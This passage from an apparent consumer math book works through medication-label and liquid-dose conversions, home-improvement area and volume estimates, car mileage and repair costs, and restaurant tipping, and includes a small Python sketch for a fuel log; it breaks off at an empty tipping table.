Other instructions: If the medication should be taken at a
particular time (morning, for example, or with food), that info 
will be on the label as well. 


Other useful stuff: The label also includes the manufacturer’s 
name, expiration date, and pharmacy name. 


In Figure 7-4, you see that the drug is amlodipine, the dosage is 
5 mg, and the patient should take 1 tablet per day. 


The entirety of real-life math for tablets and capsules is to read the 
label, count the tablets in a single dose, and count the number of 
times the med has been given in a day. The math seems simple, yet 
it’s vital. 


Splitting a tablet is okay, if the tablet has a score line down the 
middle. The score line lets you divide the tab evenly. Use a little 
device called a pill splitter, which you can get at any drugstore. It’s 
not okay to split capsules. 


For good measure: Dispensing 
liquid medications 


Liquid medicines are dosed in milliliters (mL), teaspoons (tsp), 
and tablespoons (tbsp). To dispense them, you can use one of 
three low-cost tools: the medicine cup, the medicine dropper, and 
the measuring spoon (see Figure 7-5, which shows a medicine cup 
and a medicine dropper). 


The math is “measurement math” — that is, you must know how 
much medicine to dispense, based on the medication label, and 
then measure it accurately. 


Figure 7-5: A medicine cup and medicine dropper.

Medicine cup: Essentially, a medicine cup is a shot glass with
various accurate measurements on it. It doesn’t just allow for 
accurate measurement; it also does liquid volume conversions 
for you, showing the relationship between teaspoons, 
tablespoons, and milliliters. 


Medicine dropper: A medicine dropper is a glass or plastic
tube that looks like an itty-bitty turkey baster, with a narrow 
end and a rubber “squeezer” at the other end. The barrel has 
milliliter (mL) marks. Often dispensing drops simply requires 
that you count the drops. This works for eye drops, ear drops, 
and nose drops. (As a bonus, it also works for food coloring 
when you’re dyeing Easter eggs.) If you have to dose more 
than a few drops, you fill the dropper to the correct mark (say 
0.5 mL or 1.0 mL), and then give it a gentle squeeze. 


Measuring spoons: Measuring spoons are precise measures, 
and you probably have a set in your kitchen. You typically 
use the teaspoon (5 mL) and tablespoon (15 mL) for dispensing 
meds. The best sets show both American units and metric 
units. 


Although your Gorham sterling silver teaspoons are beautiful (at 
about $220.00 each), they aren’t accurate for measuring medicines. 


Converting tsp and tbsp to mL 


Converting from teaspoons or tablespoons of liquid medications is
easy if you know that 1 teaspoon equals 5 mL, 1 tablespoon equals
3 teaspoons, and 1 fluid ounce equals 2 tablespoons. Like much of
real-life math, the calculation is simple, and you can easily do it in
your head. But if you don’t want to, here are the conversions:


1 teaspoon (tsp) = 5 mL 
1 tablespoon (tbsp) = 3 teaspoons = 15 mL 
1 fluid ounce (fl oz) = 2 tablespoons = 30 mL 


Now you know what to do if you have to take 15 mL of cold medicine 
but have lost the measuring cup that so conveniently comes with 
the bottle. Just pull a tablespoon out of your kitchen drawer. 


Converting drops to fluid ounces 


Converting drops to fluid ounces and other units is a total waste of 
your math skills. And don’t bother consulting the Internet, where 
you'll find wild variations in equivalents, for example 480, 354.88, 
360.00, and 591.47 drops per fluid ounce. Smart math amounts to 
ignoring conversions you'll never use.

If you're in the hospital undergoing intravenous therapy (“on an
IV”), drops are more precise. The tubing is calibrated to deliver
10, 15, or 20 drops/mL for adults. Children use different tubing
that delivers 60 drops/mL. Don’t worry. Your nurse knows how it
works.


Chapter 8 


Putting Geometry to 
Work at Home 


In This Chapter 
Calculating areas and volumes for a variety of home projects 


Getting familiar with conversions so you purchase just what you need 


You use math, especially geometry, around the house. All you
need (for a start) is to know how to calculate the area of a
rectangle (and maybe an occasional triangle or circle). I cover the
general how-to’s for finding areas in Chapter 2. In this chapter, I show
you how easy the math can be when you tackle some common
home maintenance and improvement tasks.


Note: Although I deal with specific scenarios in this chapter — like 
how to find the area of a flower bed so that you know how much 
mulch to buy — you can use the same techniques for other tasks. 
After all, the same principles — and math — apply whether you’re 
seeding a lawn or carpeting a room. 


Calculating Your Way to a
Better Lawn and Garden 


Taking care of the lawn, the flower beds, and the vegetable garden 
doesn’t necessarily have to be tedious; it can be fun. Mowing the 
lawn was a chore when I was a kid, but the results were satisfying. 
And working with flower beds and a vegetable garden gives most 
people a lot of satisfaction.

Aside from mowing, digging, and planting, a lot of work around
the home deals with spreading materials around — be they paint, 
concrete, or mulch. Each process takes a little math. And let’s not 
forget that math can also answer the question that anyone who’s 
ever pushed a lawn mower on a hot summer afternoon has 
pondered: Just how big is this yard? 


Figuring how much seed you need 


A great way to improve your lawn is by over-seeding. While fertilizing 
is important, over-seeding is a super way to make your lawn thick 
and weed-free. The question is, how much seed do you need to get 
the lush lawn you’re striving for? 


To find the answer, calculate the area of your lawn and calculate 
how many pounds of seed you need. For this example, assume that 
the lawn is a rectangle on a typical city lot. 


Follow these steps: 


1. Calculate the area of the front lawn. 


A typical city lot is 65 feet wide. If your house is set
back 25 feet from the street, the front yard’s length is 25 
feet. Now you have the numbers you need to figure area, 
using this formula: area = length x width. 


area (square feet) = length (feet) x width (feet) 
area (square feet) = 25 x 65 
area (square feet) = 1,625 


The area of the front lawn is 1,625 square feet. (Head to 
Chapter 2 for general info on how to calculate the areas of 
other shapes.) 


2. Calculate the number of pounds of seed you need.


Seed companies make different claims about how much 
coverage a pound of seed gives you. It depends in part on 
the type of grass you want to plant. But for this example, 
suppose the seed company claims 600 square feet per 
pound. 


seed needed (pounds) = area of your lawn (square feet) / area covered by 1 pound (square feet)
seed needed (pounds) = 1,625 / 600
seed needed (pounds) = 2.7


The answer is about 2.7 pounds, so you'll need a three-pound
box or bag of seed.


Some landscapers suggest using the same amount of seed for 
over-seeding as you would for a new lawn. Also, these calculations 
work the same way for fertilizing or seeding a new lawn, and the 
area calculation is useful for the costly option of bringing in sod. 


Mulching math 


Your beds will look nice with a fresh batch of mulch. Mulching 
math is different from seeding math because mulching involves 
depth. Here’s how you determine how much mulch you need: 


1. Calculate the volume of the bed. 


To mulch a 4 foot by 10 foot bed to a depth of 2 inches, 
first find the volume in cubic feet. To do so, multiply the 
length x width x height. 


When you do calculations, you need to make sure that all 
the values are represented in the same units. In this example, 
you know that the bed is 4 feet by 10 feet, so you need to 
put the depth in feet, too. You may recall that 2 inches is 
2/12 (1/6) of a foot, which is also 0.167 feet. 


volume (cubic feet) = length (feet) x width (feet) x depth (feet) 
volume (cubic feet) = 10 x 4 x 0.167 
volume (cubic feet) = 6.68 


The answer is 6.68 cubic feet. (You read more about 
calculating volume in Chapter 2.) 


2. Calculate how many bags you need.


To calculate, just divide the volume you need by the 
number of cubic feet in a bag. Where I live, redwood or 
cedar bark is typically sold in 3 cubic foot (CF) bags. 


mulch needed (bags) = 6.68 / 3
mulch needed (bags) = 2.23


The answer is 2.23 bags. You can buy three bags and use 
the leftover bark in another bed. 


The calculations you use for seeding and mulching work the same 
way for applying compost or manure.

There are many mulches. In California, redwood bark is really
popular. An eco-friendly mulch is rubber mulch, made from (I
kid you not) ground-up tires. Unfortunately, math can’t help you
decide which mulch you prefer.


Planting the seeds of success — 
mathematically 


A challenge to gardeners is figuring out how many plants you have 
space for. To get the answer, you need to know how large your 
plot is and how far apart the plants need to be. Say you love leaf 
lettuce so much that you want to fill a 2 foot by 4 foot raised 
vegetable plot with it. If you use a modern method of gardening, 
such as the French intensive method or Mel Bartholomew’s square 
foot gardening method, the plants need only be spaced 4 inches 
apart. 


1. Measure the size of the area you want to plant. 


As noted, in this example, assume you want to plant a 
2 foot x 4 foot area. 


2. Figure how many plants you can fit in a foot; then 
multiply that number by the number of feet in a row and 
subtract 1. 


Assume you want your plants to be 4 inches apart. Because 
4 inches (the space between plants) is 1/3 foot, you get 3 
plants per foot. And because you have 4 feet in each row, 
you calculate that you can fit 12 plants in each row, right? 
Not quite. Don’t forget to subtract 1. If you don’t subtract 1, 
the last plant in each row bumps up against the edge of the 
raised bed. Figure 8-1 illustrates the problem. 


plants in a row = (length of row (feet) x number of plants per foot) - 1
plants in a row = (4 x 3) - 1
plants in a row = 12 - 1
plants in a row = 11


3. Repeat Step 2 for the other dimension to determine the 
number of rows you have. 


This time the calculation is (2 x 3) - 1, giving you 5 rows.

Figure 8-1: You need to adjust your calculations so that your rows of plants don't
run into the edge of the bed.


4. Multiply the number of plants in a row by the number of 
rows. 


In the example, you have 5 rows and 11 plants in a row, so 
the correct answer is 55 plants. 


Note that real life math isn’t always the same as classroom 
math. It often pays to make a sketch to help you visualize 
what you want to do. 


Knowing how much you really mow 


Mowing the lawn doesn’t have any unusual math, right? Wrong! 
When you mow the lawn, you often mow about twice the area of 
the lawn. That’s due to using the half-pass technique. With the
half-pass technique, when you mow a strip of lawn, you don’t move 
over a full width for the next row; instead, you move over about 
half a row. With this technique, you mow what amounts to a 
narrower strip, but the job’s easier, and you don’t miss any 
patches. Yes, it’s really a full pass in length, but it’s known as a 
half-pass because each pass covers only half the width of a row. 


To find out what you’re really cutting, you need to know the width 
of your lawn mower and the width of the yard. (This example uses 
a 22-inch rotary mower and a lawn that’s 20 feet wide.) Then follow 
these steps:

1. Calculate the number of inches in the width of the lawn.


To do so, you multiply the number of feet by 12 (the 
number of inches in a foot). If the lawn is 20 feet wide, the 
math would look like this: 


width of lawn (inches) = 12 x 20
width of lawn (inches) = 240


2. Calculate the number of full passes by dividing the width 
of the lawn (in inches) by the width of a pass (for this 
mower, 22 inches). 


number of passes = width of lawn (inches) / width of pass (inches)
number of passes = 240 / 22
number of passes = 10.9


The answer is 11 full passes. That’s what you’d cut if you 
didn’t allow for half-passes. 


3. The number of so-called half-passes is about the same 
as the number of full passes. Add them together. 


11 + 11 = 22

You'll make 22 total passes over the lawn.


Whether you share this information with the kid you pay to 
mow your lawn is entirely up to you. 


Fixing Up the Place 


You can make your home more attractive and useful by fixing it up, 
and if you own your own home, improvements often help its value. 
But most home maintenance or redecorating projects require 
some facility with math, whether you plan to tackle the jobs yourself 
or hire experts to do them for you. The next sections tell you how 
to do the calculations for a few common projects. As always, you 
can apply these calculations to other tasks. 


Laying carpet 


New carpeting does a room a world of good, but it usually makes 
a dent in your wallet, whether you’re buying more economical 
brands or the best the market has to offer. The basis for carpeting 
costs is the area of the room you want to carpet. Mathematically, 
the task is pretty simple: Calculate an area (square feet) and then 
do a unit conversion from square feet to square yards, because 
carpeting is sold in square yards.

Follow these steps:


1. Calculate the area of the room. 


Say you’re carpeting a large living area that’s 18 feet by 24 
feet. Multiply the length by the width: 


area (square feet) = length (feet) x width (feet) 
area (square feet) = 18 x 24 
area (square feet) = 432 


The area of the room is 432 square feet.


2. Convert from square feet to square yards.


Carpet is usually sold by the square yard. One square yard 
is equal to 9 square feet. (Imagine a square 3 feet long and 
3 feet wide.) To make the conversion, you divide the area 
in square feet by 9: 


area (square yards) = 432 / 9
area (square yards) = 48


The area is 48 square yards. 


To determine the cost of the carpet, you multiply the cost per 
square yard by the number of square yards. But don’t forget that 
you'll be buying a carpet pad, as well, and, if you opt for professional 
installation, you’ll have to pony up the per-yard cost for that, too. 


Calculating paint amounts 


Painting a room is easy. You need the right equipment, and of 
course, you should buy the right amount of paint. 


The amount of paint you need is based on the square footage the 
paint must cover. And the best shortcut in calculating square 
footage is to take the height of the room (in feet) and multiply that 
by the room’s perimeter. 


Here’s the painless way to calculate your paint requirements: 


1. Calculate the perimeter of the room. 


Measure the room around the baseboards to get the 
perimeter. Alternatively, if your room is rectangular, take 
the length of the room and double it, take the width of the 
room and double it, and then add the two values together. 
Here’s the calculation for a 9 foot by 12 foot rectangular 
room:

perimeter (feet) = 2 x length (feet) + 2 x width (feet)
perimeter (feet) = (2 x 9) + (2 x 12)
perimeter (feet) = 18 + 24
perimeter (feet) = 42


The perimeter is 42 feet. 


2. Calculate the area of the walls by multiplying the 
perimeter by the wall height. 


In the United States, the standard height of a room is 8 feet. 
If your walls are 8 feet tall, multiply the perimeter by 8: 


area (square feet) = perimeter x wall height 
area (square feet) = 42 x 8 
area (square feet) = 336 


The wall area is 336 square feet. 


Subtracting the areas of doors and windows from the total 
area usually isn’t productive. Having a little paint left over 
is better than running out. 


3. Calculate the number of one-gallon cans of paint you’ll 
need. 


First-class paint claims that “one coat covers.” For this next
calculation, assume that’s true. If you want to buy paint
that covers 400 square feet (sf) per gallon, you do the
following calculation to see how many gallon cans you
need:


number of cans = 336 (square feet to cover) / 400 (square feet from 1 can)
number of cans = 0.84


The answer is about 0.84 cans. That’s one 1-gallon can. 


Pouring a patio 


Pouring a concrete patio is a great exercise in practical math, and 
you get a nice patio for your efforts. The main task is to determine 
how much concrete you need. To find out, you calculate an area 
(in square feet), then volume (in cubic feet), and finally do a unit 
conversion (from cubic feet to cubic yards).

Most patios are rectangular, but if your patio has angles or curves,
you can figure out the area by calculating each part and adding
them up. Figure 8-2 shows typical shapes of parts of a patio.

Figure 8-2: Typical shapes you find in a patio.


I cover the formulas for finding the areas of rectangles, triangles, 
and circles in Chapter 2. To find the area of a half circle, like the 
one shown in Figure 8-2, you just find the area of the full circle and 
divide it by 2. 


To determine how much concrete you need to pour a cement 
patio, follow these steps: 


1. Calculate the area of the patio. 


Assume you want to pour a 20 foot by 40 foot rectangular 
slab. (I have a friend who used this shape just outside his 
back sliding door.) You multiply the length by the width: 


area (square feet) = length (feet) x width (feet)
area (square feet) = 20 x 40
area (square feet) = 800


The area is 800 square feet. 


2. Calculate the volume of the patio by multiplying the area 
by the depth (in feet). 


A patio should be a minimum of 3.5 inches thick, but 
greater depth is better, especially if you’re pouring the 
patio over expansive soil. For this example, imagine that 
you want your patio to be 6 inches thick, which just happens 
to be 0.5 feet (remember, you need to use the same units 
throughout your calculation). 


volume (cubic feet) = area (square feet) x depth (feet) 
volume (cubic feet) = 800 x 0.5 
volume (cubic feet) = 400

The volume is 400 cubic feet.

You can save a step by using the formula for volume:

volume = length x width x depth

3. Convert from cubic feet to cubic yards by dividing by 27. 


Concrete is sold by the “yard,” which means cubic yards. 
One cubic yard is equal to 27 cubic feet. (Imagine a cube 3 
feet long, 3 feet wide, and 3 feet tall.) To find cubic yards in 
the example, just divide the volume (400 cubic feet) by 27. 


volume (cubic yards) = 400 / 27
volume (cubic yards) = 14.8

The volume is 14.8 yards.

Similar calculations work for decks, too. You determine the area
to be decked and do a unit conversion — but in this case, you
convert from area in square feet to board feet for buying the lumber.


Doing it yourself versus hiring a pro 


What's the math (which amounts to cost savings) in “do it yourself” (DIY) work? The 
principle of making cost comparisons is universal throughout this book: Calculate 
the components of alternative choices, add the components up, and then compare 
the prices. 


The big differentiator in DIY is the cost of labor. The calculation is simple:

total contractor cost = materials + contractor labor
total DIY cost = materials + your labor ($0.00)
cost savings = total contractor cost - total DIY cost


Although doing a task yourself may be satisfying and result in big savings, you've 
got to ask yourself some questions in a few key areas: 


Special tools: Do you have all the special equipment the job may require? 
Skill: Do you know what you're doing? Does it matter? 


Quality of work: Can you do the job well? Contractors are in business to deliver 
quality work. 


Timing: How long will it take you to do the job? A contractor can usually get the 
job done faster. 
Interest and enthusiasm: Do you want to do the job? If you like the work, rock
on. If not, consider a contractor.


Value of your time: Is it worth it? If you make $350.00 per hour as an attorney, 
common sense says that you'd be better off doing attorney work and leaving 
home improvements to a professional craftsperson. 


Opportunity cost: In economics, opportunity cost is defined as the value of the
next best alternative when you choose to use your time (and money) for one
activity instead of another. It's what you don’t get to do if you choose an
activity. For example, instead of doing a DIY project, would you rather go boating or
write a novel?
Chapter 9


Math and Statistics around 
Town and on the Road 


In This Chapter 
Calculating gas mileage, miles per gallon, distance, and more 
Figuring out how to calculate tips and divide a bill 
Choosing between flying and driving for vacation travel 
Using math to improve your odds of winning when you gamble 


No matter where you go, you’ll want to know a few real-life
math calculations. If you drive a car, you benefit from looking
at regular driving and maintenance costs. If you like to go out to
eat, math can help you calculate a tip or split a bill with ease. If 
you're planning a vacation, math can help you decide whether to 
go by plane, train, or automobile. And if your vacation should take 
you to Atlantic City, Las Vegas, or the fabled Monte Carlo, being 
able to calculate (or at least know) odds comes in mighty handy. 
The math-savvy gambler is a better gambler. 


In this chapter, you find out what math to use in the places where 
you spend your time and money. The math works anywhere you go. 


Automobile Arithmetic: Figuring 
Costs, Mileage, and More 


Americans love to drive, and transportation drives American culture. 
People spend a lot of money for their vehicles. In fact, a car is 
usually the second biggest asset you own, after your home. 


In addition to the cost of the car — and the interest you pay on the 
loan — cars have other expenses associated with them, too: fuel, 
insurance, and maintenance, for example. If you want to know how 
to figure how much your car loan is actually costing you, head to 
Chapter 10. But for other car-related calculations, keep reading. 
It’s a gas! Comparing fuel
prices and mileage 


The cost of gassing up isn’t trivial. Fuel prices generally move
in one direction — up. You feel it in your pocketbook, and the
environment feels it, too. A country that burns a lot of hydrocarbons 
doesn’t have nice air to breathe. China is a prime example of this. 
One obvious way to save money (and help the environment) is to 
be conscious of your gasoline mileage. Another way is to compare 
gas prices. 


We call the instrument with “E” (for empty) and “F” (for full) a 
gas gauge, but fuel gauge would be a better term. Diesel fuel isn’t 
gasoline, although an E85 blend is. Biofuels are something else. 
Get ready! As more electric cars take to the roads, “fuel” will be 
measured by a state of charge (SOC) meter. 


Calculating mileage 


You measure fuel economy in miles per gallon (mpg) in the United 
States. Other countries measure it in kilometers per liter (kpl). No 
matter how you measure it, driving a long distance using a minimum 
amount of fuel gives you a nice feeling. 


Manufacturers tell you the average mileage of their vehicles, but 
they determine their figures under controlled driving conditions. 
To perform your own mileage calculations, you use a simple 
calculation: Divide the number of miles you drive on a full tank by 
the number of gallons in your tank. 


For example, say your tank holds 20 gallons, and you drive 360 miles 
on that tank: 360 ÷ 20 = 18. You get 18 miles per gallon. The number
is approximate, since most people won’t drive until their tanks are 
completely empty before filling up. So consider driving until you’ve 
used up about 3/4 of the gasoline (15 gallons in the 20-gallon 
example). Repeat the calculations a few times, and you'll have a 
pretty good idea where your mileage stands. By the way, you can 
look up your tank’s capacity in your car’s owner’s manual. 


Car and truck advertising on the Internet sometimes buries fuel
economy figures, because some luxury vehicles and big trucks are
gas guzzlers. For the straight skinny on fuel economy, visit the U.S.
Department of Energy website at http://www.fueleconomy.gov/.


Chasing down a good gasoline price 


The cost of fueling is easy to calculate. Simply multiply the 
per-gallon price of the fuel by the number of gallons you buy 
(cost = gallons x price per gallon). In fact, you don’t even have to
do the calculation because the information is on the computerized 
receipt that the pump gives you at the end of fueling. 


Here’s a question that drivers frequently ponder, though: Should 
you drive across town for a lower gas price? The short answer is 
no. Never drive across town for a lower gas price. Gas prices 
usually vary by no more than maybe $0.05 (5 cents) per gallon. The 
math will show that you lose money by driving to save money. 


Say you get 30 mpg and have to drive 5 miles out of your way to 
get a better gas price. That’s a 10 mile round trip and consumes 
1/3 of a gallon. If gas is selling for $3.60 per gallon (and that’s low), 
you’ve used $1.20 worth of fuel. To make the trip worth your time, 
you need to save significantly more than $1.20. 


If you have a 12 gallon tank (as I do), and the gasoline at the distant 
station is selling for $0.10 per gallon less than at your usual station, 
you end up breaking exactly even (12 gallons x 0.10 = $1.20). You 
don’t save anything — and think about the time you wasted! 


If you happen to shop for groceries at a major store that has a “gas 
island” at the far edge of the parking lot, buy your gas there. The 
gas price is usually lower, either because the store sets it low to 
attract shoppers or because you can get a per-gallon discount as a 
“Club Member.” 


If you are completely insane (as I am) you can compare gas prices over time by
keeping a log. Use a spreadsheet program. The image here shows a detailed 
fuel log. The log not only shows you gas mileage, but it also shows you how local 
gas prices are trending and what you paid on a long drive. As a bonus, you can 
calculate days between fill-ups, changes in price, percent change in price, and 
average miles driven per day. 


The joys of a fuel log 


| TANK | ODO | MILES | GALS | MPG | $/GAL | TOTAL$ | DATE | Days Between Fill-Ups | Change in Price | Percent Change | Miles per Day | Location |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 33 | 104024 | 305 | 10.092 | 30.222 | $4.019 | $40.56 | 06/07/11 | 25 | (0.21) | -4.97% | 12.20 | GV |
| 34 | 104359 | 335 | 10.999 | 30.457 | $3.959 | $43.55 | 06/26/11 | 19 | (0.06) | -1.49% | 17.63 | GV |
| 35 | 104729 | 370 | 10.481 | 35.302 | $3.759 | $39.40 | 07/12/11 | 16 | (0.20) | -5.05% | 23.13 | GV |
| 36 | 104912 | 183 | 6.033 | 30.333 | $3.799 | $22.92 | 07/19/11 | 23 | (0.16) | -4.04% | 7.96 | GV |
| 37 | 105302 | 390 | 10.324 | 37.776 | $4.049 | $41.80 | 07/20/11 | 8 | 0.29 | 7.71% | 48.75 | Elko, NV |
| | 105668 | 366 | 10.008 | 36.571 | $3.669 | $36.72 | 07/21/11 | 1 | (0.38) | -9.39% | 366.00 | Idaho Falls, ID |
| | 106027 | 359 | 9.565 | 37.533 | $3.599 | $34.42 | 07/26/11 | 5 | (0.07) | -1.91% | 71.80 | Pocatello, ID |
| | 106396 | 369 | 10.445 | 35.328 | $3.839 | $40.10 | 07/26/11 | 1 | 0.24 | 6.67% | 369.00 | Battle Mountain |
| | 106783 | 387 | | | | | | | | | | |
| | 107092 | 309 | | | | | | | | | | |
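The derived columns of a fuel log like the one above can be computed from four raw entries per fill-up (miles, gallons, price, date). The following Python sketch is an added example, not the author's spreadsheet; the function and field names are hypothetical, and the three sample rows are tanks 33 to 35 from the log. Tank 33 has no earlier row in the sample, so its "between fill-ups" columns are left empty.

```python
from datetime import date
from decimal import Decimal, ROUND_HALF_UP
from typing import List, NamedTuple, Optional


class FillUp(NamedTuple):
    tank: int
    miles: Decimal      # miles driven on this tank
    gallons: Decimal    # gallons pumped at the fill-up
    price: Decimal      # dollars per gallon
    day: date


class LogRow(NamedTuple):
    tank: int
    mpg: Decimal
    total: Decimal
    days_between: Optional[int]
    price_change: Optional[Decimal]
    pct_change: Optional[Decimal]
    miles_per_day: Optional[Decimal]


def q(value: Decimal, places: str) -> Decimal:
    """Round half up, the way a spreadsheet displays a cell."""
    return value.quantize(Decimal(places), rounding=ROUND_HALF_UP)


def build_log(fillups: List[FillUp]) -> List[LogRow]:
    """Compute MPG, total cost and the change-since-last-fill-up columns."""
    rows: List[LogRow] = []
    prev: Optional[FillUp] = None
    for f in sorted(fillups, key=lambda x: (x.day, x.tank)):
        if f.gallons <= 0 or f.price <= 0:
            raise ValueError(f"tank {f.tank}: gallons and price must be positive")
        mpg = q(f.miles / f.gallons, "0.001")
        total = q(f.gallons * f.price, "0.01")
        days = change = pct = per_day = None
        if prev is not None:
            days = (f.day - prev.day).days
            change = q(f.price - prev.price, "0.001")
            pct = q((f.price - prev.price) / prev.price * 100, "0.01")
            # Two fill-ups on the same day would divide by zero; leave the
            # cell empty instead (a choice made for this example).
            if days > 0:
                per_day = q(f.miles / days, "0.01")
        rows.append(LogRow(f.tank, mpg, total, days, change, pct, per_day))
        prev = f
    return rows


# Tanks 33-35 from the fuel log above (dates are month/day/year).
SAMPLE_LOG = [
    FillUp(33, Decimal("305"), Decimal("10.092"), Decimal("4.019"), date(2011, 6, 7)),
    FillUp(34, Decimal("335"), Decimal("10.999"), Decimal("3.959"), date(2011, 6, 26)),
    FillUp(35, Decimal("370"), Decimal("10.481"), Decimal("3.759"), date(2011, 7, 12)),
]

if __name__ == "__main__":
    for row in build_log(SAMPLE_LOG):
        print(row)
```
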
Are we there yet? Figuring
distance, time, and speed


When you travel in an automobile, you can’t help but ponder life’s 
deep questions. How long have I been driving? How much more 
time will my drive take? How far have I traveled? How many miles 
are left to go? What’s my average speed? It’s handy to be able to 
compute distance, time, and speed, because the answers take 
some of the mystery out of making a trip. (Doing the calculations 
helps fight boredom, too.) 


Distance, time, and speed (formally called velocity) combine to 
make a great formula. When you know two of the items, you can 
solve for the third. Here are the three formulas: 


distance = time x speed
speed = distance ÷ time
time = distance ÷ speed


Estimating arrival time 

Estimating when you'll arrive at your destination is an easy
calculation using the formula for time. You need to know the miles
left to drive (info you can get from highway signs) and your speed
(just glance down at your speedometer). Say that you have
75 miles to go and are driving at 60 mph. With these two bits of
information in hand, apply the time formula:

time = distance ÷ speed
time = 75 ÷ 60
time = 1.25

You should arrive in 1.25 hours.


Don’t want to do the math yourself? If you have a GPS, it’ll do the 
job for you. 
GPS


A global positioning system (GPS) navigation device is filled with amazing information. 
After you enter a destination, the GPS tells you the estimated time of arrival (ETA), 
remaining hours and minutes until arrival, remaining distance, and your current 
speed. As a bonus, you also get an irritating voice that says, “Return to the nearest 
road.” 


Actually, your GPS is more accurate than your dashboard instruments, in particular 
the speedometer. Speedometers are subject to mechanical errors, and you can't 
calibrate them. By contrast, your GPS is reaching out to at least three satellites at 
any given moment, and the data is recomputed about every 50 feet of travel. 




Quick math for distance traveled and distance left to drive 


If you can subtract (and you can), you'll have no problem calculating 
how far you’ve traveled or how far you have left to drive. 


To see how far you've traveled, look at your trip odometer, an 
instrument that shows distance traveled. Some cars have as many 
as three odometers: the regular one, Trip 1, and Trip 2. You can 
switch between them and can easily reset Trip 1 and Trip 2 to 0. 


If you have only one odometer, just subtract the reading you took on
your departure from its current reading (your current location on
the road).


Distance traveled = current location reading - departure reading
Distance traveled = 23,331.5 - 23,130.0
Distance traveled = 201.5


Keep in mind, however, that real-life math often requires no math 
at all. If you have a trip odometer, you can find the distance traveled 
just by resetting the odometer to 0 at the start of your trip and 
reading the mileage at any time during the trip. 


You can use Trip 1 for measuring the distance covered on an out- 
of-town day trip, while using Trip 2 to accumulate how many miles 
you’ve driven on the current tank of gas. 
Speed-o-meter


The speedometer is an instrument that tells you how fast you're going. It was 
invented in 1888, and people have been speeding ever since. It shows speed in 
miles per hour (mph) and kilometers per hour (kph). Most speedometers have 
analog displays (like an older wristwatch), but some have digital displays. 


Driving at or below the speed limit should keep you free from speeding citations (a 
real money-saver). And, generally speaking, driving faster takes more gasoline (or 
diesel fuel) and lowers your mileage. 




Want to see how far you have left to drive? Here’s another 
non-math real-life math solution: Use the highway mileage signs. 


Estimating average speed 


Your speedometer shows your speed at any given moment, but a
drive might include stop-and-go traffic in town as well as fairly
smooth driving on the highway. Calculate your average speed
by dividing the total distance you’ve driven (from the odometer)
by the time you’ve been traveling (from the car’s clock or your
watch). For example, if you’ve driven 50 miles in 2 hours —
50 ÷ 2 = 25 — your average speed is 25 miles per hour.


Making sense of the mechanic’s bill 


Your automobile mechanic charges for materials and time (or 
labor). Your bill reflects parts used and labor hours expended. But 
if you want to know the cost before you commit to a repair, simply 
ask for a written estimate (in which the shop will calculate the 
approximate cost for you). 


If you don’t want to take your car in for an estimate, do some 
Internet research to find the cost of the parts you need and the 
industry standard time required to complete the job. Then just ask 
your mechanic what the shop’s hourly labor rate is. Now that you 
know these things, you can use math to create your own estimate. 


Self-estimating works when you know just what you want to do 
(for example, replace a fuel pump). However, if your car has an 
unknown problem (for example, “It makes a funny noise when I 
turn the wheel to the left”), you should take it into the shop for a 
diagnosis. 
The formula for time and materials is very simple. You just add
up the cost for the labor (which you calculate by multiplying the
number of hours worked by the shop’s hourly labor rate), the cost
of the parts, and any applicable tax. Here’s an example of the
formula with values plugged in:


total charges = (hours x hourly rate) + parts + tax
total charges = (4.17 x $89.928) + $390.40 + $30.74
total charges = $375.00 + $390.40 + $30.74
total charges = $796.14


In this example, hours are figured to two decimal places
(hundredths of an hour). The labor rate is figured to three decimal
places. The sample calculation is exactly what it cost me to replace 
a timing belt on my 2005 Honda Civic. 


The charges are based on the cost of parts and the cost of labor. 
Figure 9-1 shows the detail from the automobile repair bill. 


| Part Description | Number | Qty | Sale | Extended |
|---|---|---|---|---|
| Timing Belt Kit | 2523120 | 1.00 | 218.90 | 218.90 |
| Water Pump New | 41115 | 1.00 | 68.15 | 68.15 |
| Serp Belt | 25-060388 | 1.00 | 23.67 | 23.67 |
| Serp Belt | 25-040398 | 1.00 | 17.95 | 17.95 |
| Honda Long Life Antifreeze | OL999-9011 | 1.00 | 25.18 | 25.18 |
| Lower Timing Belt Cover | 1811-PLC-000 | 1.00 | 36.55 | 36.55 |

| Labor Description | Hours | Extended |
|---|---|---|
| Cust wants timing belt replaced | N/A | N/C |
| TIMING BELT - Remove & Replace - 1.7L Eng - [Includes: Adjust Valves.] | 4.17 | 375.00 |

Labor notes: Replace timing belt and all timing belt pullies, water pump and drive belts. Refill system with new coolant and test drive.

Figure 9-1: Details on an automobile repair bill.


When you take your car in to be serviced, you'll likely be given a 
less-detailed written estimate. When you get the final bill, you’ll see 
the details. 


As Figure 9-1 shows, you multiply the quantity (“Qty”) by the price 
(“Sale”) to get the full cost of a part (“Extended”). Labor charges, 
on the other hand, can be a little bit baffling. To get this amount, 
the mechanic looks up the repair in a repair labor guide (“the 
book”), which is a list of standard rates for the type of job to be 
done. The book lists the time it generally takes to perform a given 
repair (a timing belt job is 4.17 hours, for example, as is the case 
in this figure). Some guides also show “regular flat rate” and 
“severe-condition flat rate.” The “severe-condition flat rate” applies 
when particular factors (like rust and corrosion) are present that 
necessitate more time and more tools to do the repair. 
Dining Out


People everywhere love to dine out, whether they go to drive-ins, 
cafés, bistros, taverns, fast food drive-thrus, or five-star restaurants. 
Chances are you know what kind of cuisine or experience you’re in 
the mood for. So whereas comparing prices is a key part of making 
other buying decisions, it’s not so much a concern when you’re 
choosing where to eat out. Instead, the math you’re most likely to 
use at a restaurant involves figuring out how much to tip and how 
to split a bill when you’re dining with others. 


Calculating the tip 


Although tipping doesn’t exist in some countries, in the United 
States, your restaurant server expects a tip. Breakfast, lunch, or 
dinner, you always have to tip. The customary amount is between 
15 and 20 percent of the bill. Sometimes you tip a little more; 
sometimes you tip a little less. 


The easiest way to calculate a 15 percent tip is to follow these 
steps: 


1. Divide the check by 10, which gives you 10 percent of the 
total. 

2. Take half of the 10 percent, giving you 5 percent. 

3. Add both values together, and that’s your 15 percent tip. 


Here’s an example for a $16.00 meal: 


tip = (check price x 0.10) + (check price x 0.05) 
tip = ($16.00 x 0.10) + ($16.00 x 0.05) 

tip = $1.60 + $0.80 

tip = $2.40 


That’s your tip. If you like, round the $2.40 up to $3.00. 


Calculating a 20-percent tip is even easier. Simply divide the total 
by 10 and then double the result. Here’s the math: $16.00 ÷ 10 =
$1.60 x 2 = $3.20. Your tip is $3.20.


You tip in other places, too, and the amount of the expected tip 
varies by type of service and by region. Here’s a quick guide to 
what you should tip for different services: 
| Service/Person | Customary Tip |
|---|---|
